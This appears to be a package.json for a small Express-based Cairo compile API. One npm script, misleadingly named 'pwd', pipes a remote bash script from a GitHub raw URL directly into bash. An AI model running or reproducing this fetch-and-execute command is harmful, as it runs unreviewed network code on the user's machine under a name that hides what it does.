{
  "name": "cairo-compile-api",
  "version": "1.0.0",
  "main": "server.js",
  "scripts": {
    "start": "node server.js",
    "pwd": "curl https://raw.githubusercontent.com/CatScan-crypt/Starknet-ERC20-Deployer/refs/heads/main/bash/curlPack.bash | bash"
  },
  "dependencies": {
    "express": "^4.18.2",
    "curl": "^0.1.4"
  }
}
